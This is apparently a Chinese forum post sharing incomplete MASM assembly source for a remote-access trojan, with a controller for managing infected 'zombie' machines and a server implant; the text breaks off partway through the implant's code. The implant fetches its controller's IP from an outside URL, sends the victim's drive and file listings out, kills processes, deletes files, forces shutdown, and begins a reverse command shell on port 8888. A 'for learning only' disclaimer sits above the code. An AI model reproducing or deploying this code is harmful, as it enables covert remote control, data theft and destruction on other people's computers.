这是一个被作者中途放弃的程序,尽管代码质量不高,但已实现多用户同时在线的功能。作者分享了代码以便他人学习和改进,强调仅供合法用途。
这个程序写到一半,就不想写了,所以代码写得比较龌龊,但是还是可以多用户上线的,其他的你们可以自己修改吧...........发上来给需要的人,说不定对你们谁有用呢..................
注意:代码仅供学习之用,若用此代码修改写成恶意程序,与我无关.....
client.asm
;******************************************************
;程序编写by Asm
;日期:2007-6-13日
;出处: http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组( http://www.wolfexp.net/)
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include wsock32.inc
includelib wsock32.lib
include Shlwapi.inc
includelib Shlwapi.lib
include comdlg32.inc
includelib comdlg32.lib
include ole32.inc
includelib ole32.lib
include shell32.inc
includelib shell32.lib
include odbc32.inc
includelib odbc32.lib
include macros.inc
include data.INC
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;客户端会话
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SESSION struct
dwip dd ?
hsocket db 12 dup (?)
szHostIP db 156 dup(?)
szHostName db 156 dup(?)
szHostTime db 156 dup(?)
szWhat db 156 dup(?)
SESSION ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;自定义协议结构,显示肉鸡上线信息
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
MSG_SYSINFO struct
dwip dd ?
szHostIP db 156 dup(?)
szHostName db 156 dup(?)
szHostTime db 156 dup(?)
szWhat db 156 dup(?)
MSG_SYSINFO ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;显示下线日志
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ShowProcess proc uses edi row:DWORD,lpTime:DWORD
LOCAL lvi:LV_ITEM
LOCAL buffer[1024]:DWORD
mov lvi.imask,LVIF_TEXT+LVIF_PARAM ;填充
push row
pop lvi.iItem ;传递row的值为lvi.iItem,纪录列举的文件个数
mov lvi.iSubItem,0
mov eax,lpTime;保存文件名到eax.这里lpFileName不是指针,所以用mov。如果是指针,用lea
mov lvi.pszText,eax;用文件名填充lvi.pszText
push row
pop lvi.lParam;传递row的值为lParam
invoke SendMessage,hlistview, LVM_InsertITEM,0, addr lvi ;输出每个文件名
;***********************************************************
ret
ShowProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 字符串到16或10进制
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_StrToVal proc _lpString,_dwBase
mov esi,_lpString
cld
xor eax,eax
mov ebx,_dwBase
.while TRUE
movzx ecx,byte ptr [esi]
inc esi
.break .if ! ecx
.if cl > '9'
and cl,not 20h
sub cl,'A' - 0ah
.else
sub cl,'0'
.endif
mul ebx
add eax,ecx
.endw
ret
_StrToVal endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;此函数的用途是选择每一个连接上的肉鸡socket的编号
;并发送命令
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
GetSocketAndSend proc _CmdLine:DWORD
pushad
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETCURSEL,0,0
lea ecx,@buff1
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETTEXT,eax,ecx
invoke _StrToVal,addr @buff1,00000010h
mov edi,eax
invoke lstrlen,_CmdLine
invoke send,edi,_CmdLine,eax,0
popad
ret
GetSocketAndSend endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_OpenFile proc _FileBuff:DWORD
local @stOF:OPENFILENAME
local @stES:EDITSTREAM
;********************************************************************
; 显示“打开文件”对话框
;********************************************************************
invoke RtlZeroMemory,addr @stOF,sizeof @stOF
mov @stOF.lStructSize,sizeof @stOF
push hWinMain
pop @stOF.hwndOwner
mov @stOF.lpstrFilter,offset szFilter
mov eax,_FileBuff
mov @stOF.lpstrFile,eax
mov @stOF.nMaxFile,MAX_PATH
mov @stOF.Flags,OFN_FILEMUSTEXIST or OFN_PATHMUSTEXIST
mov @stOF.lpstrDefExt,CTXT("文件")
invoke GetOpenFileName,addr @stOF
ret
_OpenFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 显示肉鸡上线数量
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_AddClient proc _hSocket
invoke WSAAsyncSelect,_hSocket,hWinMain,WM_SOCKET,FD_READ or FD_CLOSE
xor ebx,ebx
mov esi,offset stTable
.while ebx < MAX_SOCKET
.if ! dword ptr [esi]
push _hSocket
pop [esi]
inc dwCount
invoke wsprintf,addr @buff,CTXT("%x"),_hSocket
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,addr @buff
invoke SetDlgItemInt,hWinMain,IDC_Socket,dwCount,FALSE
ret
.endif
inc ebx
add esi,4
.endw
invoke closesocket,_hSocket
ret
_AddClient endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;肉鸡下线就去掉一个socket,并删除ListBox里的socket编号
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RemoveClient proc _hSocket
local szTime:SYSTEMTIME
local szBuff[1024]:DWORD
local @dwListviewitem
xor ebx,ebx
xor ecx,ecx
mov esi,offset stTable
mov edi,_hSocket
.while ebx < MAX_SOCKET
.if [esi] == edi
invoke closesocket,[esi]
mov dword ptr [esi],0
dec dwCount
invoke SetDlgItemInt,hWinMain,IDC_Socket,dwCount,FALSE
invoke GetSystemTime,addr szTime
movzx eax,szTime.wMonth
movzx ecx,szTime.wDay
movzx edx,szTime.wHour
movzx ebx,szTime.wMinute
invoke wsprintf,addr szBuff,CTXT("有主机下线请注意,下线时间为:%d月%d日%d时%d秒"),eax,ecx,edx,ebx
; invoke _ListViewSetItem,hlistview,@dwListviewitem,ONE-1,addr szBuff
invoke ShowProcess,ecx,addr szBuff
inc ecx
invoke SendDlgItemMessage,hWinMain,IDC_Log,LB_ADDSTRING,0,addr szBuff
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETCURSEL,0,0
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_DeleteSTRING,eax,0
ret
.endif
inc ebx
add esi,4
.endw
ret
_RemoveClient endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 处理接收到的TCP包
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RecvDataServer proc _hSocket
invoke RtlZeroMemory,addr szReadBuffer,sizeof szReadBuffer
invoke recv,_hSocket,addr szReadBuffer,sizeof szReadBuffer,NULL
invoke StrStr,addr szReadBuffer,CTXT(":/") ;对接收的数据进行处理,是否有:/ 有则代表是文件路径
.if eax!=NULL
inc lpAllFile
invoke SendDlgItemMessage,hWinMain2,IDC_FileList,LB_ADDSTRING,0,addr szReadBuffer
invoke SetDlgItemText,hWinMain2,IDC_GetSomeThing,addr szReadBuffer
invoke wsprintf,addr szFileShuMu,CTXT("%d 个文件或目录"),lpAllFile
invoke SetDlgItemText,hWinMain2,IDC_AllFile,addr szFileShuMu
.endif
; invoke StrStr,addr szReadBuffer,CTXT("computerIP")
; .if eax!=NULL
; invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,addr szReadBuffer
; .endif.
invoke StrStr,addr szReadBuffer,CTXT(":/") ;对接受的数据进行处理,如果没有 :/ 同时有 .exe 就代表是进程。
.if eax==NULL
invoke StrStr,addr szReadBuffer,CTXT(".exe")
.if eax!=NULL
inc lpShuMu
invoke SendDlgItemMessage,hWinMain1,IDC_ProcessList,LB_ADDSTRING,0,addr szReadBuffer
invoke wsprintf,addr szProcessShuMu,CTXT("%d 个进程"),lpShuMu
invoke SetDlgItemText,hWinMain1,IDC_ProcessShuMu,addr szProcessShuMu
.endif
.endif
;对接受的数据进行处理,如果有[info]这个标识,说明这个数据显示的是肉鸡的上线信息
;然后把[info]这6个字符串从数据中清除。
invoke StrStr,addr szReadBuffer,CTXT("[info]")
.if eax!=NULL
pushad
invoke lstrlen,addr szReadBuffer
sub eax,6
lea esi,szReadBuffer
lea edi,buff2
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
;invoke MessageBox,0,addr buff2,0,0
.endif
ret
_RecvDataServer endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 初始化 Socket,绑定到服务TCP端口并监听
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Init proc
local @stWsa:WSADATA
local @stSin:sockaddr_in
invoke WSAStartup,101h,addr @stWsa
invoke socket,AF_INET,SOCK_STREAM,0
mov Socket,eax
invoke WSAAsyncSelect,Socket,hWinMain,WM_SOCKET,FD_ACCEPT
invoke RtlZeroMemory,addr @stSin,sizeof @stSin
invoke htons,9999
mov @stSin.sin_port,ax
mov @stSin.sin_family,AF_INET
mov @stSin.sin_addr,INADDR_ANY
invoke bind,Socket,addr @stSin,sizeof @stSin
.if eax == SOCKET_ERROR
invoke MessageBox,hWinMain,CTXT("本程序已经监听,无法进行第二次操作"),NULL,/
MB_OK or MB_ICONWARNING
ret
.else
invoke listen,Socket,5
.endif
ret
_Init endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgProcess proc uses ebx edi esi hWnd1,wMsg,wParam,lParam
local @szBuffer[128]:byte
local szKillProcess[1024]:byte
local szOut[1024]:byte
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd1,NULL
.elseif eax == WM_INITDIALOG
push hWnd1
pop hWinMain1
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd1,WM_SETICON,ICON_BIG,eax
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_GetProcessList
mov lpShuMu,0
invoke SendDlgItemMessage,hWnd1,IDC_ProcessList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getprocess]")
.elseif ax == IDC_ProcessList
shr eax,16
.if ax == LBN_SELCHANGE
;********************************************************************
; 将鼠标点击结果弹出来
;********************************************************************
invoke SendMessage,lParam,LB_GETCURSEL,0,0
lea ecx,@szBuffer
invoke SendMessage,lParam,LB_GETTEXT,eax,ecx
invoke wsprintf,addr szOut,CTXT("你确定要结束对方 %s 这个进程吗?"),addr @szBuffer
invoke MessageBox,hWnd1,addr szOut,CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
.if eax!=IDNO
invoke RtlZeroMemory,addr szKillProcess,sizeof szKillProcess
invoke lstrcat,addr szKillProcess,addr @szBuffer
invoke lstrcat,addr szKillProcess,CTXT("[killprocess]")
invoke GetSocketAndSend,addr szKillProcess
.endif
.endif
.elseif ax == IDC_RefeProcessList
mov lpShuMu,0
invoke SendDlgItemMessage,hWinMain1,IDC_ProcessList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getprocess]")
.elseif ax == IDC_ExitWindows
invoke MessageBox,hWnd1,CTXT("这条命令会无条件关闭对方电脑,是否要执行?"),CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
.if eax!=IDNO
invoke GetSocketAndSend,CTXT("[exitwindows]")
.endif
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgFile proc uses ebx edi esi hWnd1,wMsg,wParam,lParam
local @szBuffer1[1024]:byte
local @szBuffer2[1024]:byte
local buff[1024]:byte
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd1,NULL
.elseif eax == WM_INITDIALOG
push hWnd1
pop hWinMain2
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd1,WM_SETICON,ICON_BIG,eax
mov lpAllFile,0
invoke GetSocketAndSend,CTXT("[getfile]")
;invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_ADDSTRING,0,CTXT("d:/asm.txt")
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_LookFile1
invoke _OpenFile,addr szBenDiFile
invoke SetDlgItemText,hWnd1,IDC_BenDiFile,addr szBenDiFile
.elseif ax == IDC_FileList
mov lpAllFile,0
shr eax,16
.if ax == LBN_SELCHANGE
;********************************************************************
; 将鼠标点击结果弹出来
;********************************************************************
invoke SendMessage,lParam,LB_GETCURSEL,0,0
lea ecx,@szBuffer1
invoke SendMessage,lParam,LB_GETTEXT,eax,ecx
invoke RtlZeroMemory,addr @szBuffer2,sizeof @szBuffer2
invoke lstrcat,addr @szBuffer2,addr @szBuffer1
invoke lstrcat,addr @szBuffer2,CTXT("[getfilepaht]")
invoke GetSocketAndSend,addr @szBuffer2
invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_RESETCONTENT,0,0
invoke SetDlgItemText,hWnd1,IDC_YuanChengFile,addr @szBuffer1
invoke SetDlgItemText,hWnd1,IDC_FileToLoadOnYuanCheng,addr @szBuffer1
invoke SetDlgItemText,hWnd1,IDC_FileToDel,addr @szBuffer1
.endif
.elseif ax == IDC_LookFile2
invoke _OpenFile,addr szBenDiFile1
invoke SetDlgItemText,hWnd1,IDC_FileToLoadOnBenDi,addr szBenDiFile1
.elseif (ax == IDC_CHECK2)||(ax == IDC_LoadDownFile)
;
.elseif ax == IDC_DelFile
invoke MessageBox,hWnd1,CTXT("真的要删除远程主机上的文件吗?"),CTXT("友情提示"),MB_ICONINFORMATION
.if eax!=IDNO
invoke GetDlgItemText,hWnd1,IDC_FileToDel,addr szFileToDel,sizeof szFileToDel
invoke lstrlen,addr szFileToDel
sub eax,0
lea esi,szFileToDel
lea edi,buff
add esi,2
mov ecx,eax
rep movsb
mov byte ptr [edi],0
invoke StrStr,addr szFileToDel,CTXT(".")
.if eax==NULL
invoke MessageBox,NULL,CTXT("你选择的不是文件,无法删除"),CTXT("友情提示"),MB_ICONSTOP
.elseif eax!=NULL
invoke lstrcat,addr szDelFile,addr szFileToDel
invoke lstrcat,addr szDelFile,CTXT("[delfile]")
invoke lstrlen,addr szDelFile
invoke MessageBox,0,addr szDelFile,0,0
invoke GetSocketAndSend,addr szDelFile
.endif
.endif
.elseif ax == IDC_RefeFileList
mov lpAllFile,0
invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getfile]")
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
mov eax,wMsg
.if eax == WM_SOCKET
mov eax,lParam
.if ax == FD_ACCEPT
invoke accept,wParam,0,0 ;等待连接
mov hSocket1,eax
invoke CreateThread,NULL,0,addr _AddClient,hSocket1,0,addr ThreadId
.elseif ax == FD_READ
invoke CreateThread,NULL,0,addr _RecvDataServer,wParam,0,addr ThreadId1
.elseif ax == FD_CLOSE
invoke CreateThread,NULL,0,addr _RemoveClient,wParam,0,addr ThreadId2
.endif
.elseif eax == WM_CLOSE
invoke closesocket,Socket
invoke WSACleanup
invoke EndDialog,hWnd,NULL
;//
.elseif eax == WM_INITDIALOG
push hWnd
pop hWinMain
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke GetDlgItem,hWnd,IDC_Log
mov hlistview,eax
;invoke InsertColumn
;初始化控件
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_LoadServer
invoke MessageBox,NULL,CTXT("配制服务端,暂时不写进去"),0,0
.elseif ax == IDC_Port
call _Init
.elseif ax == IDC_Process
invoke DialogBoxParam,hInstance,DLG_Process,NULL,offset _ProcDlgProcess,NULL
.elseif ax == IDC_File
invoke DialogBoxParam,hInstance,DLG_File,NULL,offset _ProcDlgFile,NULL
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
server.asm
;******************************************************
;程序编写by Asm
;日期:2007-6-13日
;出处: http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组( http://www.wolfexp.net/)
;******************************************************
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
include wininet.inc
include advapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
includelib wininet.lib
includelib advapi32.lib
include Shlwapi.inc
includelib Shlwapi.lib
include w2k/ntdll.inc
includelib ntdll.lib
include macros.inc
MSG_SYSINFO struct
dwip dd ?
szHostIP db 156 dup(?)
szHostName db 156 dup(?)
szHostTime db 156 dup(?)
szWhat db 156 dup(?)
MSG_SYSINFO ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;这里不能包含ntddk.inc,否则和windows.inc产生矛盾。因此要自定义SE_SHUTDOWN_PRIVILEGE的值
SE_SHUTDOWN_PRIVILEGE equ 19
SendSysInfo proto :LPSTR
.data
lpBuffer db 10024 dup(0)
buff db "%s",13,10,0
szUrl db ' http://www.asm32.cn/ip.txt',0
szVol db 'C',0
szRegKey db "SOFTWARE/Microsoft/Windows",0
szKey db "zhushi",0 ;键值名称
.data?
szIP db 1024 dup(?)
buff1 db 1025 dup(?)
szSerice db 1024 dup(?)
server SOCKET ?
client SOCKET ?
hWinMain dd ?
hSnapShot dd ?
closepid dd ?
Pid dd ?
dwFolderCount dd ?
@stData WSADATA<?>
ThreadId DWORD ?
ThreadId1 DWORD ?
ThreadId2 DWORD ?
ThreadId3 DWORD ?
ThreadId4 DWORD ?
ThreadId5 DWORD ?
ThreadId6 DWORD ?
ThreadId7 DWORD ?
stMsg MSG<?>
szHostName db 1024 dup(?)
SendData db 1024 dup(?)
SendData1 db 1024 dup(?)
szHost db 1024 dup(?)
buffer db 1024 dup(?)
buff2 db 1024 dup(?)
buff3 db 1024 dup(?)
buff4 db 1024 dup(?)
buff5 db 10024 dup(?)
buff6 db 10024 dup(?)
sysinfo MSG_SYSINFO<?>
szSysinfoData db 1024 dup(?)
szKeyName db 100 dup(?)
.const
MEMORYSIZE equ 50
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DelFile proc _filename:DWORD
invoke DeleteFile,_filename
ret
_DelFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetFilePath proc _lpszPath
local @stFindFile:WIN32_FIND_DATA
local @hFindFile
local @szPath[MAX_PATH]:byte ;用来存放“路径/”
local @szSearch[MAX_PATH]:byte ;用来存放“路径/*.*”
local @szFindFile[1025]:byte ;用来存放“路径/找到的文件”
local hWnd
pushad
invoke RtlZeroMemory,addr @szPath,sizeof @szPath
invoke RtlZeroMemory,addr @szSearch,sizeof @szSearch
invoke lstrcpy,addr @szPath,_lpszPath
;********************************************************************
; 在路径后面加上/*.*
;********************************************************************
@@:
invoke lstrlen,addr @szPath
lea ecx,@szPath
add ecx,eax
xor eax,eax
mov al,'/'
.if byte ptr [ecx-1] != al
mov word ptr [ecx],ax
.endif
invoke lstrcpy,addr @szSearch,addr @szPath
invoke lstrcat,addr @szSearch,CTXT("*.*")
;********************************************************************
; 寻找文件
;********************************************************************
invoke FindFirstFile,addr @szSearch,addr @stFindFile
.if eax != INVALID_HANDLE_VALUE
mov @hFindFile,eax
.repeat
invoke lstrcpy,addr @szFindFile,addr @szPath
invoke lstrcat,addr @szFindFile,addr @stFindFile.cFileName
.if @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY ;找到的是目录吗?
.if @stFindFile.cFileName != '.'
inc dwFolderCount
; invoke MessageBox,0,addr @szFindFile,0,MB_ICONSTOP;如果找到的是目录,就递归继续找
invoke lstrlen,addr @szFindFile
invoke send,server,addr @szFindFile,eax,0
invoke Sleep,1000
.endif
.else
; invoke MessageBox,0,addr @szFindFile,0,MB_ICONINFORMATION
invoke lstrlen,addr @szFindFile
invoke send,server,addr @szFindFile,eax,0
invoke Sleep,1000
.endif
invoke FindNextFile,@hFindFile,addr @stFindFile
.until eax == FALSE
invoke FindClose,@hFindFile
.endif
popad
ret
_GetFilePath endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetFileDsik proc _socket
local szDisk[10]:byte
invoke Sleep,10
invoke lstrcpy,addr szVol,CTXT("C")
.while szVol<='Z'
invoke lstrcat,addr szDisk,addr szVol
invoke lstrcat,addr szDisk,CTXT(":/")
invoke GetDriveType,addr szDisk
.if eax==DRIVE_FIXED
invoke lstrlen,addr szDisk
invoke send,_socket,addr szDisk,eax,0
invoke Sleep,1000
.elseif eax==DRIVE_REMOVABLE
invoke lstrlen,addr szDisk
invoke send,_socket,addr szDisk,eax,0
invoke Sleep,1000
.endif
invoke RtlZeroMemory,addr szDisk,sizeof szDisk
inc szVol
.endw
ret
_GetFileDsik endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ExitWindows proc
local ShutDown:DWORD
invoke RtlAdjustPrivilege,SE_SHUTDOWN_PRIVILEGE,TRUE,TRUE,addr ShutDown
.if eax==00C000007Ch
invoke RtlAdjustPrivilege,SE_SHUTDOWN_PRIVILEGE,TRUE,FALSE,addr ShutDown
invoke ZwShutdownSystem,2
.endif
ret
_ExitWindows endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_KillProcess proc processname:DWORD
local stProcess:PROCESSENTRY32
invoke RtlZeroMemory,addr stProcess,sizeof stProcess;清空内存
mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
.while eax
invoke CompareString,LOCALE_USER_DEFAULT,NORM_IGNORECASE,processname,-1,addr stProcess.szExeFile,-1
.if eax==2
push stProcess.th32ProcessID
pop closepid
.endif
invoke Process32Next,hSnapShot,addr stProcess
.endw
invoke OpenProcess,PROCESS_TERMINATE,FALSE,closepid
.if eax
mov ebx,eax
invoke TerminateProcess,ebx,-1
.endif
ret
_KillProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetProcessList proc _socket
local stProcess:PROCESSENTRY32
invoke RtlZeroMemory,addr stProcess,sizeof stProcess;清空内存
mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
.while eax
invoke lstrlen,addr stProcess.szExeFile
invoke send,_socket,addr stProcess.szExeFile,eax,0
; invoke MessageBox,0,addr stProcess.szExeFile,0,0
invoke Sleep,1000
invoke Process32Next,hSnapShot,addr stProcess
.endw
ret
_GetProcessList endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
LOCAL hToken
LOCAL tkp : TOKEN_PRIVILEGES
invoke GetCurrentProcess ;GetCurrentProcess获得当前进程的HANDLE
mov edx, eax
invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken ;获取进程访问令牌
invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid;一个权限对应的LUID值
mov tkp.PrivilegeCount, 1
xor eax, eax
.if bFlags
mov eax, SE_PRIVILEGE_ENABLED
.endif
mov tkp.Privileges.Attributes, eax
invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0 ;对这个访问令牌进行修改
push eax
invoke CloseHandle, hToken
pop eax
ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ReadInternet proc
local @hSession,@hHttpFile,@dwRead ;局部参数
pushad ;所有寄存器压栈保存
; invoke RtlZeroMemory,addr szIP,sizeof szIP
invoke InternetOpen,CTXT("ReadFile"),INTERNET_OPEN_TYPE_PRECONFIG,/
NULL,NULL,0 ;打开internet
.if eax ;测试返回值
mov @hSession,eax ;保存句柄
.endif
invoke InternetOpenUrl,@hSession,addr szUrl,NULL,0,INTERNET_FLAG_NO_AUTO_REDIRECT,0
.if eax
mov @hHttpFile,eax
.endif
invoke InternetReadFile,@hHttpFile,addr szIP,sizeof szIP,addr @dwRead;读出IP并且保存
invoke InternetCloseHandle,@hHttpFile;关闭句柄
invoke InternetCloseHandle,@hSession
popad ;恢复
ret
_ReadInternet endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Cmd proc
local @wsaData:WSADATA
local @stAddr:sockaddr_in
local stStartUp:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
local hSocket
invoke WSAStartup,202h,addr @wsaData ;初始化WSAStartup库
invoke WSASocket,PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;加载套接字
mov hSocket,eax ;保存句柄
mov @stAddr.sin_family,AF_INET ;设置IP格式
invoke htons,8888 ;设置端口
mov @stAddr.sin_port,ax ;保存
invoke inet_addr,addr szIP;转换读取到的IP
mov @stAddr.sin_addr,eax
invoke connect,hSocket,addr @stAddr,sizeof @stAddr;如果有客户端连接,马上确定
